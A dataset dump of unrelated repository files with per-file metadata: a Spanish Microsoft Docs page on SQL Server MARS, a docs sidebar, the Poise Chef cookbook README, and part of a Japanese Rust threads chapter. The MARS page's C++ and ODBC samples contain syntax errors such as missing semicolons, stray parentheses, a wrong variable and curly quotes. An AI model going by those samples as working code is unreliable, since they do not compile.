--- title: Uso de conjuntos de resultados activos múltiples (MARS) | Microsoft Docs ms.custom: '' ms.date: 03/16/2017 ms.prod: sql ms.reviewer: '' ms.technology: native-client ms.topic: reference helpviewer_keywords: - SQL Server Native Client OLE DB provider, MARS - SQLNCLI, MARS - data access [SQL Server Native Client], MARS - Multiple Active Result Sets - SQL Server Native Client, MARS - MARS [SQL Server] - SQL Server Native Client ODBC driver, MARS ms.assetid: ecfd9c6b-7d29-41d8-af2e-89d7fb9a1d83 author: MightyPen ms.author: genemi manager: craigg monikerRange: '>=aps-pdw-2016||=azuresqldb-current||=azure-sqldw-latest||>=sql-server-2016||=sqlallproducts-allversions||>=sql-server-linux-2017||=azuresqldb-mi-current' ms.openlocfilehash: 3e05d6734333e6863d2f487cf77943763fdd8229 ms.sourcegitcommit: 61381ef939415fe019285def9450d7583df1fed0 ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 10/01/2018 ms.locfileid: "47816135" --- # <a name="using-multiple-active-result-sets-mars"></a>Utilizar conjuntos de resultados activos múltiples (MARS) [!INCLUDE[appliesto-ss-asdb-asdw-pdw-md](../../../includes/appliesto-ss-asdb-asdw-pdw-md.md)] [!INCLUDE[SNAC_Deprecated](../../../includes/snac-deprecated.md)] En [!INCLUDE[ssVersion2005](../../../includes/ssversion2005-md.md)], se ha introducido la compatibilidad con los conjuntos de resultados activos múltiples (MARS) para las aplicaciones que acceden a [!INCLUDE[ssDE](../../../includes/ssde-md.md)]. En versiones anteriores de [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)], las aplicaciones de base de datos no podían mantener varias instrucciones activas en una conexión. La aplicación, cuando utilizaba conjuntos de resultados predeterminados de [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)], tenía que procesar o cancelar todos los conjuntos de resultados de un lote para poder ejecutar cualquier otro lote en esa conexión. En [!INCLUDE[ssVersion2005](../../../includes/ssversion2005-md.md)] se introdujo un nuevo atributo de conexión que permite a las aplicaciones tener más de una solicitud pendiente por conexión y, en particular, tener más de un conjunto de resultados predeterminado activo por conexión. MARS simplifica el diseño de aplicaciones con una serie de capacidades nuevas que se indican a continuación: - Las aplicaciones pueden tener varios conjuntos de resultados predeterminados abiertos e intercalar la lectura de los mismos. - Las aplicaciones pueden ejecutar otras instrucciones (por ejemplo, INSERT, UPDATE, DELETE y llamadas a procedimientos almacenados) mientras los conjuntos de resultados predeterminados están abiertos. Las aplicaciones que usan MARS encontrarán útiles las siguientes directrices: - Los conjuntos de resultados predeterminados deben usarse para conjuntos de resultados cortos o de corta duración generados por instrucciones SQL únicas (SELECT, DML con OUTPUT, RECEIVE, READ TEXT, etc.). - Los cursores de servidor deben usarse para conjuntos de resultados mayores o de mayor duración generados por instrucciones SQL únicas. - Lea siempre los resultados hasta el final para las solicitudes de procedimientos, independientemente de que devuelvan o no resultados, y para los lotes que devuelven varios resultados. - Siempre que sea posible, use llamadas a la API para cambiar las propiedades de conexión y administrar las transacciones con prioridad con respecto a las instrucciones [!INCLUDE[tsql](../../../includes/tsql-md.md)]. - En MARS, está prohibida la suplantación de ámbito de sesión mientras se ejecutan lotes simultáneos. > [!NOTE] > De forma predeterminada, no está habilitada la funcionalidad de MARS. Para usar MARS al conectarse a [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] con [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] Native Client, debe habilitarlo específicamente dentro de una cadena de conexión. Para obtener más información, vea las secciones sobre el proveedor OLE DB de [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] Native Client y el controlador ODBC de [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] Native Client, más adelante en este tema. [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] Native Client no limita el número de instrucciones activas en una conexión. Las aplicaciones típicas que no necesitan tener más de un único lote de varias instrucciones o un único procedimiento almacenado que se ejecute al mismo tiempo podrán beneficiarse de MARS sin necesidad de entender cómo se implementa MARS. No obstante, las aplicaciones con requisitos más complejos necesitan tener estas consideraciones en cuenta. MARS habilita la ejecución intercalada de varias solicitudes dentro de una única conexión. Es decir, permite la ejecución de un lote y, dentro de su ejecución, permite que se ejecuten otras solicitudes. Tenga en cuenta, no obstante, que MARS se define en términos de intercalación, no de ejecución en paralelo. La infraestructura de MARS permite la ejecución de varios lotes en modo intercalado, aunque la ejecución solo puede intercambiarse en puntos bien definidos. Además, la mayoría de las instrucciones deben ejecutarse de forma atómica dentro de un lote. Las instrucciones que devuelven las filas al cliente, que a veces se conocen como *puntos de rendimiento*, se pueden intercalar la ejecución antes de completarse mientras se envían filas al cliente, por ejemplo: - SELECT - FETCH - RECEIVE Cualquier otra instrucción que se ejecute como parte de un procedimiento almacenado o de un lote deberá ejecutarse hasta completarse para poder cambiar la ejecución a otras solicitudes MARS. La manera exacta en la que los lotes intercalan la ejecución se ve afectada por diversos factores, y es difícil predecir la secuencia exacta en la que se ejecutarán los comandos procedentes de varios lotes que contengan puntos de rendimiento. Tenga cuidado para evitar efectos secundarios no deseados debidos a la ejecución intercalada de esos lotes complejos. Evite problemas utilizando llamadas a la API en lugar de instrucciones [!INCLUDE[tsql](../../../includes/tsql-md.md)] para administrar el estado de conexión (SET, USE) y las transacciones (BEGIN TRAN, COMMIT, ROLLBACK) no incluyendo estas instrucciones en lotes de varias instrucciones que también contengan puntos de rendimiento y serializando la ejecución de dichos lotes mediante el consumo o la cancelación de todos los resultados. > [!NOTE] > Un lote o un procedimiento almacenado que inicie una transacción manual o implícita cuando MARS esté habilitado debe completar la transacción antes de salir del lote. Si no lo hace, [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] revierte todos los cambios realizados por la transacción cuando finaliza el lote. [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] administra este tipo de transacción como una transacción de ámbito de lote. Se trata de un nuevo tipo de transacción que se introdujo en [!INCLUDE[ssVersion2005](../../../includes/ssversion2005-md.md)] para permitir el uso de procedimientos almacenados con comportamiento correcto cuando MARS está habilitado. Para obtener más información acerca de las transacciones de lote, vea [instrucciones Transaction &#40;Transact-SQL&#41;](~/t-sql/statements/statements.md). Para obtener un ejemplo del uso de MARS desde ADO, vea [utilizar ADO con SQL Server Native Client](../../../relational-databases/native-client/applications/using-ado-with-sql-server-native-client.md). ## <a name="in-memory-oltp"></a>OLTP en memoria OLTP en memoria admite MARS mediante consultas y procedimientos almacenados compilados de forma nativa. MARS permite solicitantes datos de varias consultas sin necesidad de recuperar completamente cada conjunto antes de enviar una solicitud para capturar las filas de un nuevo conjunto de resultados de resultados. Para leer correctamente de resultados abiertos varios conjuntos debe usar un MARS habilitado conexión. MARS está deshabilitada de forma predeterminada, por lo que debe habilitar explícitamente mediante la adición de `MultipleActiveResultSets=True` en una cadena de conexión. El ejemplo siguiente muestra cómo conectarse a una instancia de SQL Server y especificar que MARS está habilitado: ``` Data Source=MSSQL; Initial Catalog=AdventureWorks; Integrated Security=SSPI; MultipleActiveResultSets=True ``` MARS con OLTP en memoria es básicamente el mismo que MARS en el resto del motor de SQL. A continuación enumeran las diferencias al utilizar MARS en las tablas optimizadas para memoria y de forma nativa procedimientos almacenados compilados. **Las tablas optimizadas para memoria y MARS** Estas son las diferencias entre las tablas basadas en disco y optimizadas para memoria cuando el uso de un MARS habilitado conexión: - Dos instrucciones pueden modificar los datos en el mismo objeto de destino, pero si intentan modificar el mismo registro un conflicto de escritura contra escritura hará que la operación de nuevo un error. Sin embargo, si ambas operaciones modifican distintos registros, las operaciones se realizará correctamente. - Cada instrucción se ejecuta con aislamiento de instantánea para que nuevas operaciones no pueden ver los cambios realizados por las instrucciones existentes. Incluso si se ejecutan las instrucciones simultáneas en la misma transacción el motor SQL crea transacciones de lote para cada instrucción que están aisladas entre sí. Sin embargo, las transacciones de lote todavía se enlazan juntos para la reversión de una transacción de lote afecta a otros registros en el mismo lote. - No se permiten operaciones de DDL en las transacciones de usuario inmediatamente generará un error. **MARS y procedimientos almacenados compilados de forma nativa** Procedimientos almacenados compilados de forma nativa se pueden ejecutar en las conexiones de MARS habilitado y pueden ceda la ejecución a otra instrucción solo cuando se encuentra un punto de rendimiento. Un punto de rendimiento requiere una instrucción SELECT, que es la única instrucción en un procedimiento almacenado compilado de forma nativa que puede ofrecer la ejecución a otra instrucción. Si una instrucción SELECT no está presente en el procedimiento no dará como resultado, se ejecutará hasta su finalización antes de comenzar otras instrucciones. **Transacciones de MARS y OLTP en memoria** Los cambios realizados por instrucciones y bloques atomic que se intercalan están aislados entre sí. Por ejemplo, si una instrucción o bloque atomic realiza algunos cambios y, a continuación, proporciona una ejecución a otra instrucción, la nueva instrucción no verán los cambios realizados por la primera instrucción. Además, cuando la primera instrucción reanuda la ejecución, no verán los cambios realizados por cualquier otra instrucción. Las instrucciones solo verá los cambios que se finaliza y confirma antes de que se inicia la instrucción. Se puede iniciar una nueva transacción de usuario dentro de la transacción de usuario actual mediante la instrucción BEGIN TRANSACTION: Esto se admite solo en modo de interoperabilidad, por lo que solo se puede llamar a BEGIN TRANSACTION de una instrucción de Transact-SQL y no desde dentro de compilado de forma nativa almacenan procedimiento. Puede crear una operación de guardar punto en una transacción utilizando SAVE TRANSACTION o una llamada de API a la transacción. Save(save_point_name) para revertir al punto de retorno. Esta característica también se habilita solo desde las instrucciones de T-SQL y no desde dentro de forma nativa procedimientos almacenados compilados. **MARS y los índices de almacén de columnas** SQL Server (a partir de 2016) es compatible con MARS con índices de almacén de columnas. SQL Server 2014 usa MARS para las conexiones de solo lectura a las tablas con un índice de almacén de columnas. Pero SQL Server 2014 no es compatible con MARS para operaciones simultáneas de lenguaje de manipulación de datos (DML) en una tabla con un índice de almacén de columnas. Cuando ocurre esto, SQL Server termina las conexiones y anula las transacciones. SQL Server 2012 tiene índices de almacén de columnas de sólo lectura y MARS no se aplica a ellos. ## <a name="sql-server-native-client-ole-db-provider"></a>Proveedor OLE DB de SQL Server Native Client El [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] proveedor OLE DB de Native Client admite MARS mediante la adición de la propiedad de inicialización de SSPROP_INIT_MARSCONNECTION data source, que se implementa en el conjunto de propiedades DBPROPSET_SQLSERVERDBINIT. Además, se ha agregado una nueva palabra clave de cadena de conexión, **MarsConn**. Acepta **true** o **false** valores; **false** es el valor predeterminado. El valor predeterminado de la propiedad de origen de datos DBPROP_MULTIPLECONNECTIONS es VARIANT_TRUE. Esto significa que el proveedor generará varias conexiones para admitir varios comandos y objetos de conjunto de filas simultáneos. Cuando MARS está habilitado, [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] Native Client puede admitir varios objetos de comando y conjunto de filas en una sola conexión, por lo que MULTIPLE_CONNECTIONS se establece de forma predeterminada en VARIANT_FALSE. Para obtener más información acerca de las mejoras realizadas en el conjunto de propiedades DBPROPSET_SQLSERVERDBINIT, vea [propiedades de inicialización y autorización](../../../relational-databases/native-client-ole-db-data-source-objects/initialization-and-authorization-properties.md). ### <a name="sql-server-native-client-ole-db-provider-example"></a>Ejemplo del proveedor OLE DB de SQL Server Native Client En este ejemplo, se crea un objeto de origen de datos mediante el [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] proveedor OLE DB nativo y MARS está habilitado el uso de propiedades DBPROPSET_SQLSERVERDBINIT antes de crea el objeto de sesión. ``` #include <sqlncli.h> IDBInitialize *pIDBInitialize = NULL; IDBCreateSession *pIDBCreateSession = NULL; IDBProperties *pIDBProperties = NULL; // Create the data source object. hr = CoCreateInstance(CLSID_SQLNCLI10, NULL, CLSCTX_INPROC_SERVER, IID_IDBInitialize, (void**)&pIDBInitialize); hr = pIDBInitialize->QueryInterface(IID_IDBProperties, (void**)&pIDBProperties); // Set the MARS property. DBPROP rgPropMARS; // The following is necessary since MARS is off by default. rgPropMARS.dwPropertyID = SSPROP_INIT_MARSCONNECTION; rgPropMARS.dwOptions = DBPROPOPTIONS_REQUIRED; rgPropMARS.dwStatus = DBPROPSTATUS_OK; rgPropMARS.colid = DB_NULLID; V_VT(&(rgPropMARS.vValue)) = VT_BOOL; V_BOOL(&(rgPropMARS.vValue)) = VARIANT_TRUE; // Create the structure containing the properties. DBPROPSET PropSet; PropSet.rgProperties = &rgPropMARS; PropSet.cProperties = 1; PropSet.guidPropertySet = DBPROPSET_SQLSERVERDBINIT; // Get an IDBProperties pointer and set the initialization properties. pIDBProperties->SetProperties(1, &PropSet); pIDBProperties->Release(); // Initialize the data source object. hr = pIDBInitialize->Initialize(); //Create a session object from a data source object. IOpenRowset * pIOpenRowset = NULL; hr = IDBInitialize->QueryInterface(IID_IDBCreateSession, (void**)&pIDBCreateSession)); hr = pIDBCreateSession->CreateSession( NULL, // pUnkOuter IID_IOpenRowset, // riid &pIOpenRowset )); // ppSession // Create a rowset with a firehose mode cursor. IRowset *pIRowset = NULL; DBPROP rgRowsetProperties[2]; // To get a firehose mode cursor request a // forward only read only rowset. rgRowsetProperties[0].dwPropertyID = DBPROP_IRowsetLocate; rgRowsetProperties[0].dwOptions = DBPROPOPTIONS_REQUIRED; rgRowsetProperties[0].dwStatus = DBPROPSTATUS_OK; rgRowsetProperties[0].colid = DB_NULLID; VariantInit(&(rgRowsetProperties[0].vValue)); rgRowsetProperties[0].vValue.vt = VARIANT_BOOL; rgRowsetProperties[0].vValue.boolVal = VARIANT_FALSE; rgRowsetProperties[1].dwPropertyID = DBPROP_IRowsetChange; rgRowsetProperties[1].dwOptions = DBPROPOPTIONS_REQUIRED; rgRowsetProperties[1].dwStatus = DBPROPSTATUS_OK; rgRowsetProperties[1].colid = DB_NULLID; VariantInit(&(rgRowsetProperties[1].vValue)); rgRowsetProperties[1].vValue.vt = VARIANT_BOOL; rgRowsetProperties[1].vValue.boolVal = VARIANT_FALSE; DBPROPSET rgRowsetPropSet[1]; rgRowsetPropSet[0].rgProperties = rgRowsetProperties rgRowsetPropSet[0].cProperties = 2 rgRowsetPropSet[0].guidPropertySet = DBPROPSET_ROWSET; hr = pIOpenRowset->OpenRowset (NULL, &TableID, NULL, IID_IRowset, 1, rgRowsetPropSet (IUnknown**)&pIRowset); ``` ## <a name="sql-server-native-client-odbc-driver"></a>Controlador ODBC de SQL Server Native Client El [!INCLUDE[ssNoVersion](../../../includes/ssnoversion-md.md)] controlador ODBC de Native Client admite MARS mediante adiciones a la [SQLSetConnectAttr](../../../relational-databases/native-client-odbc-api/sqlsetconnectattr.md) y [SQLGetConnectAttr](../../../relational-databases/native-client-odbc-api/sqlgetconnectattr.md) funciones. SQL_COPT_SS_MARS_ENABLED se ha agregado para aceptar SQL_MARS_ENABLED_YES o SQL_MARS_ENABLED_NO, siendo SQL_MARS_ENABLED_NO el valor predeterminado. Además, una nueva cadena de conexión de palabra clave, **Mars_Connection**, tal y como se ha agregado. Acepta valores "yes" o "no"; "no" es el valor predeterminado. ### <a name="sql-server-native-client-odbc-driver-example"></a>Ejemplo del controlador ODBC de SQL Server Native Client En este ejemplo, el **SQLSetConnectAttr** función se utiliza para habilitar MARS antes de llamar a la **SQLDriverConnect** función para conectarse a la base de datos. Una vez realizada la conexión, dos **SQLExecDirect** se llama a funciones para crear dos conjuntos de resultados independientes en la misma conexión. ``` #include <sqlncli.h> SQLSetConnectAttr(hdbc, SQL_COPT_SS_MARS_ENABLED, SQL_MARS_ENABLED_YES, SQL_IS_UINTEGER); SQLDriverConnect(hdbc, hwnd, "DRIVER=SQL Server Native Client 10.0; SERVER=(local);trusted_connection=yes;", SQL_NTS, szOutConn, MAX_CONN_OUT, &cbOutConn, SQL_DRIVER_COMPLETE); SQLAllocHandle(SQL_HANDLE_STMT, hdbc, &hstmt1); SQLAllocHandle(SQL_HANDLE_STMT, hdbc, &hstmt2); // The 2nd execute would have failed with connection busy error if // MARS were not enabled. SQLExecDirect(hstmt1, L”SELECT * FROM Authors”, SQL_NTS); SQLExecDirect(hstmt2, L”SELECT * FROM Titles”, SQL_NTS); // Result set processing can interleave. SQLFetch(hstmt1); SQLFetch(hstmt2); ``` ## <a name="see-also"></a>Vea también [Características de SQL Server Native Client](../../../relational-databases/native-client/features/sql-server-native-client-features.md) [Usar conjuntos de resultados predeterminados de SQL Server](../../../relational-databases/native-client-odbc-cursors/implementation/using-sql-server-default-result-sets.md)
79.954545
991
0.778542
spa_Latn
0.97314
bb24d13606d49bbf1f684d8d3eda33110e4abbb9
216
md
Markdown
docs/_sidebar.md
hack4impact-uiuc/mentee
c56945db8051e798c7bf6703577a0e50a54b0d67
[ "MIT" ]
7
2020-10-03T22:45:38.000Z
2021-10-02T09:54:40.000Z
docs/_sidebar.md
hack4impact-uiuc/mentee
c56945db8051e798c7bf6703577a0e50a54b0d67
[ "MIT" ]
265
2020-10-01T20:06:27.000Z
2022-02-27T12:18:55.000Z
docs/_sidebar.md
hack4impact-uiuc/mentee
c56945db8051e798c7bf6703577a0e50a54b0d67
[ "MIT" ]
1
2020-10-06T19:57:37.000Z
2020-10-06T19:57:37.000Z
<!-- docs/_sidebar.md --> - General - [Home](README) - Frontend - [Getting Started](frontend/setup) - Backend - [Getting Started](backend/setup) - [File Structure](backend/file_structure.md)
15.428571
49
0.625
yue_Hant
0.277577
bb250d432d85b64fcfb7d5a1dc6b86983e3000ea
8,609
md
Markdown
cookbooks/poise/README.md
sanjeevkumarrao/chef-demo
be72936c314170e1b8994e65dec779d0dc1e3097
[ "Apache-2.0" ]
null
null
null
cookbooks/poise/README.md
sanjeevkumarrao/chef-demo
be72936c314170e1b8994e65dec779d0dc1e3097
[ "Apache-2.0" ]
null
null
null
cookbooks/poise/README.md
sanjeevkumarrao/chef-demo
be72936c314170e1b8994e65dec779d0dc1e3097
[ "Apache-2.0" ]
1
2020-08-05T14:41:02.000Z
2020-08-05T14:41:02.000Z
# Poise [![Build Status](https://img.shields.io/travis/poise/poise.svg)](https://travis-ci.org/poise/poise) [![Gem Version](https://img.shields.io/gem/v/poise.svg)](https://rubygems.org/gems/poise) [![Cookbook Version](https://img.shields.io/cookbook/v/poise.svg)](https://supermarket.chef.io/cookbooks/poise) [![Coverage](https://img.shields.io/codecov/c/github/poise/poise.svg)](https://codecov.io/github/poise/poise) [![Gemnasium](https://img.shields.io/gemnasium/poise/poise.svg)](https://gemnasium.com/poise/poise) [![License](https://img.shields.io/badge/license-Apache_2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) ## What is Poise? The poise cookbook is a set of libraries for writing reusable cookbooks. It provides helpers for common patterns and a standard structure to make it easier to create flexible cookbooks. ## Writing your first resource Rather than LWRPs, Poise promotes the idea of using normal, or "heavy weight" resources, while including helpers to reduce much of boilerplate needed for this. Each resource goes in its own file under `libraries/` named to match the resource, which is in turn based on the class name. This means that the file `libraries/my_app.rb` would contain `Chef::Resource::MyApp` which maps to the resource `my_app`. An example of a simple shell to start from: ```ruby require 'poise' require 'chef/resource' require 'chef/provider' module MyApp class Resource < Chef::Resource include Poise provides(:my_app) actions(:enable) attribute(:path, kind_of: String) # Other attribute definitions. end class Provider < Chef::Provider include Poise provides(:my_app) def action_enable notifying_block do ... # Normal Chef recipe code goes here end end end end ``` Starting from the top, first we require the libraries we will be using. Then we create a module to hold our resource and provider. If your cookbook declares multiple resources and/or providers, you might want additional nesting here. Then we declare the resource class, which inherits from `Chef::Resource`. This is similar to the `resources/` file in an LWRP, and a similar DSL can be used. We then include the `Poise` mixin to load our helpers, and then call `provides(:my_app)` to tell Chef this class will implement the `my_app` resource. Then we use the familiar DSL, though with a few additions we'll cover later. Then we declare the provider class, again similar to the `providers/` file in an LWRP. We include the `Poise` mixin again to get access to all the helpers and call `provides()` to tell Chef what provider this is. Rather than use the `action :enable do ... end` DSL from LWRPs, we just define the action method directly. The implementation of action comes from a block of recipe code wrapped with `notifying_block` to capture changes in much the same way as `use_inline_resources`, see below for more information about all the features of `notifying_block`. We can then use this resource like any other Chef resource: ```ruby my_app 'one' do path '/tmp' end ``` ## Helpers While not exposed as a specific method, Poise will automatically set the `resource_name` based on the class name. ### Notifying Block As mentioned above, `notifying_block` is similar to `use_inline_resources` in LWRPs. Any Chef resource created inside the block will be converged in a sub-context and if any have updated it will trigger notifications on the current resource. Unlike `use_inline_resources`, resources inside the sub-context can still see resources outside of it, with lookups propagating up sub-contexts until a match is found. Also any delayed notifications are scheduled to run at the end of the main converge cycle, instead of the end of this inner converge. This can be used to write action methods using the normal Chef recipe DSL, while still offering more flexibility through subclassing and other forms of code reuse. ### Include Recipe In keeping with `notifying_block` to implement action methods using the Chef DSL, Poise adds an `include_recipe` helper to match the method of the same name in recipes. This will load and converge the requested recipe. ### Resource DSL To make writing resource classes easier, Poise exposes a DSL similar to LWRPs for defining actions and attributes. Both `actions` and `default_action` are just like in LWRPs, though `default_action` is rarely needed as the first action becomes the default. `attribute` is also available just like in LWRPs, but with some enhancements noted below. One notable difference over the standard DSL method is that Poise attributes can take a block argument. #### Template Content A common pattern with resources is to allow passing either a template filename or raw file content to be used in a configuration file. Poise exposes a new attribute flag to help with this behavior: ```ruby attribute(:name, template: true) ``` This creates four methods on the class, `name_source`, `name_cookbook`, `name_content`, and `name_options`. If the name is set to `''`, no prefix is applied to the function names. The content method can be set directly, but if not set and source is set, then it will render the template and return it as a string. Default values can also be set for any of these: ```ruby attribute(:name, template: true, default_source: 'app.cfg.erb', default_options: {host: 'localhost'}) ``` As an example, you can replace this: ```ruby if new_resource.source template new_resource.path do source new_resource.source owner 'app' group 'app' variables new_resource.options end else file new_resource.path do content new_resource.content owner 'app' group 'app' end end ``` with simply: ```ruby file new_resource.path do content new_resource.content owner 'app' group 'app' end ``` As the content method returns the rendered template as a string, this can also be useful within other templates to build from partials. #### Lazy Initializers One issue with Poise-style resources is that when the class definition is executed, Chef hasn't loaded very far so things like the node object are not yet available. This means setting defaults based on node attributes does not work directly: ```ruby attribute(:path, default: node['myapp']['path']) ... NameError: undefined local variable or method 'node' ``` To work around this, Poise extends the idea of lazy initializers from Chef recipes to work with resource definitions as well: ```ruby attribute(:path, default: lazy { node['myapp']['path'] }) ``` These initializers are run in the context of the resource object, allowing complex default logic to be moved to a method if desired: ```ruby attribute(:path, default: lazy { my_default_path }) def my_default_path ... end ``` #### Option Collector Another common pattern with resources is to need a set of key/value pairs for configuration data or options. This can done with a simple Hash, but an option collector attribute can offer a nicer syntax: ```ruby attribute(:mydata, option_collector: true) ... my_app 'name' do mydata do key1 'value1' key2 'value2' end end ``` This will be converted to `{key1: 'value1', key2: 'value2'}`. You can also pass a Hash to an option collector attribute just as you would with a normal attribute. ## Upgrading from Poise 1.x The biggest change when upgrading from Poise 1.0 is that the mixin is no longer loaded automatically. You must add `require 'poise'` to your code is you want to load it, as you would with normal Ruby code outside of Chef. It is also highly recommended to add `provides(:name)` calls to your resources and providers, this will be required in Chef 13 and will display a deprecation warning if you do not. This also means you can move your code out of the `Chef` module namespace and instead declare it in your own namespace. An example of this is shown above. ## Sponsors The Poise test server infrastructure is generously sponsored by [Rackspace](https://rackspace.com/). Thanks Rackspace! ## License Copyright 2013-2015, Noah Kantrowitz Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
38.262222
543
0.762226
eng_Latn
0.996508
bb252848fcf4f16474a421e96b7218b8e31349b6
22,652
md
Markdown
second-edition/src/ch16-01-threads.md
woodyZootopia/book-ja
fcd11b305e1759139520ec7baee13ebfff79e6f8
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
null
null
null
second-edition/src/ch16-01-threads.md
woodyZootopia/book-ja
fcd11b305e1759139520ec7baee13ebfff79e6f8
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
null
null
null
second-edition/src/ch16-01-threads.md
woodyZootopia/book-ja
fcd11b305e1759139520ec7baee13ebfff79e6f8
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
null
null
null
<!-- ## Using Threads to Run Code Simultaneously --> ## スレッドを使用してコードを同時に走らせる <!-- In most current operating systems, an executed program’s code is run in a --> <!-- *process*, and the operating system manages multiple processes at once. Within --> <!-- your program, you can also have independent parts that run simultaneously. The --> <!-- features that run these independent parts are called *threads*. --> 多くの現代のOSでは、実行中のプログラムのコードは*プロセス*で走り、OSは同時に複数のプロセスを管理します。 自分のプログラム内で、独立した部分を同時に実行できます。これらの独立した部分を走らせる機能を*スレッド*と呼びます。 <!-- Splitting the computation in your program into multiple threads can improve --> <!-- performance because the program does multiple tasks at the same time, but it --> <!-- also adds complexity. Because threads can run simultaneously, there’s no --> <!-- inherent guarantee about the order in which parts of your code on different --> <!-- threads will run. This can lead to problems, such as: --> プログラム内の計算を複数のスレッドに分けると、パフォーマンスが改善します。プログラムが同時に複数の作業をするからですが、 複雑度も増します。スレッドは同時に走らせることができるので、異なるスレッドのコードが走る順番に関して、 本来的に保証はありません。これは例えば以下のような問題を招きます: <!-- * Race conditions, where threads are accessing data or resources in an --> <!-- inconsistent order --> <!-- * Deadlocks, where two threads are waiting for each other to finish using a --> <!-- resource the other thread has, preventing both threads from continuing --> <!-- * Bugs that happen only in certain situations and are hard to reproduce and fix --> <!-- reliably --> * スレッドがデータやリソースに矛盾した順番でアクセスする競合状態 * 2つのスレッドがお互いにもう一方が持っているリソースを使用し終わるのを待ち、両者が継続するのを防ぐデッドロック * 特定の状況でのみ起き、確実な再現や修正が困難なバグ <!-- Rust attempts to mitigate the negative effects of using threads, but --> <!-- programming in a multithreaded context still takes careful thought and requires --> <!-- a code structure that is different from programs that run in a single --> <!-- thread. --> Rustは、スレッドを使用する際の悪影響を軽減しようとしていますが、それでも、マルチスレッドの文脈でのプログラミングでは、 注意深い思考とシングルスレッドで走るプログラムとは異なるコード構造が必要です。 <!-- Programming languages implement threads in a few different ways. Many operating --> <!-- systems provide an API for creating new threads. This model where a language --> <!-- calls the operating system APIs to create threads is sometimes called *1:1*, --> <!-- meaning one operating system thread per one language thread. --> プログラミング言語によってスレッドはいくつかの方法で実装されています。多くのOSで、新規スレッドを生成するAPIが提供されています。 言語がOSのAPIを呼び出してスレッドを生成するこのモデルを時に*1:1*と呼び、1つのOSスレッドに対して1つの言語スレッドを意味します。 <!-- Many programming languages provide their own special implementation of threads. --> <!-- Programming language-provided threads are known as *green* threads, and --> <!-- languages that use these green threads will execute them in the context of a --> <!-- different number of operating system threads. For this reason, the --> <!-- green-threaded model is called the *M:N* model: there are `M` green threads per --> <!-- `N` operating system threads, where `M` and `N` are not necessarily the same --> <!-- number. --> 多くのプログラミング言語がスレッドの独自の特別な実装を提供しています。プログラミング言語が提供するスレッドは、 *グリーン*スレッドとして知られ、このグリーンスレッドを使用する言語は、それを異なる数のOSスレッドの文脈で実行します。 このため、グリーンスレッドのモデルは*M:N*モデルと呼ばれます: `M`個のグリーンスレッドに対して、 `N`個のOSスレッドがあり、`M`と`N`は必ずしも同じ数字ではありません。 <!-- Each model has its own advantages and trade-offs, and the trade-off most --> <!-- important to Rust is runtime support. *Runtime* is a confusing term and can --> <!-- have different meanings in different contexts. --> 各モデルには、それだけの利点と代償があり、Rustにとって最も重要な代償は、ランタイムのサポートです。 *ランタイム*は、混乱しやすい用語で文脈によって意味も変わります。 <!-- In this context, by *runtime* we mean code that is included by the language in --> <!-- every binary. This code can be large or small depending on the language, but --> <!-- every non-assembly language will have some amount of runtime code. For that --> <!-- reason, colloquially when people say a language has “no runtime,” they often --> <!-- mean “small runtime.” Smaller runtimes have fewer features but have the --> <!-- advantage of resulting in smaller binaries, which make it easier to combine the --> <!-- language with other languages in more contexts. Although many languages are --> <!-- okay with increasing the runtime size in exchange for more features, Rust needs --> <!-- to have nearly no runtime and cannot compromise on being able to call into C to --> <!-- maintain performance. --> この文脈での*ランタイム*とは、言語によって全てのバイナリに含まれるコードのことを意味します。 言語によってこのコードの大小は決まりますが、非アセンブリ言語は全てある量の実行時コードを含みます。 そのため、口語的に誰かが「ノーランタイム」と言ったら、「小さいランタイム」のことを意味することがしばしばあります。 ランタイムが小さいと機能も少ないですが、バイナリのサイズも小さくなるという利点があり、 その言語を他の言語とより多くの文脈で組み合わせることが容易になります。多くの言語では、 より多くの機能と引き換えにランタイムのサイズが膨れ上がるのは、受け入れられることですが、 Rustにはほとんどゼロのランタイムが必要でパフォーマンスを維持するためにCコードを呼び出せることを妥協できないのです。 <!-- The green-threading M:N model requires a larger language runtime to manage --> <!-- threads. As such, the Rust standard library only provides an implementation of --> <!-- 1:1 threading. Because Rust is such a low-level language, there are crates that --> <!-- implement M:N threading if you would rather trade overhead for aspects such as --> <!-- more control over which threads run when and lower costs of context switching, --> <!-- for example. --> M:Nのグリーンスレッドモデルは、スレッドを管理するのにより大きな言語ランタイムが必要です。よって、 Rustの標準ライブラリは、1:1スレッドの実装のみを提供しています。Rustはそのような低級言語なので、 例えば、むしろどのスレッドがいつ走るかのより詳細な制御や、より低コストの文脈切り替えなどの一面をオーバーヘッドと引き換えるなら、 M:Nスレッドの実装をしたクレートもあります。 <!-- Now that we’ve defined threads in Rust, let’s explore how to use the --> <!-- thread-related API provided by the standard library. --> 今やRustにおけるスレッドを定義したので、標準ライブラリで提供されているスレッド関連のAPIの使用法を探究しましょう。 <!-- ### Creating a New Thread with `spawn` --> ### `spawn`で新規スレッドを生成する <!-- To create a new thread, we call the `thread::spawn` function and pass it a --> <!-- closure (we talked about closures in Chapter 13) containing the code we want to --> <!-- run in the new thread. The example in Listing 16-1 prints some text from a main --> <!-- thread and other text from a new thread: --> 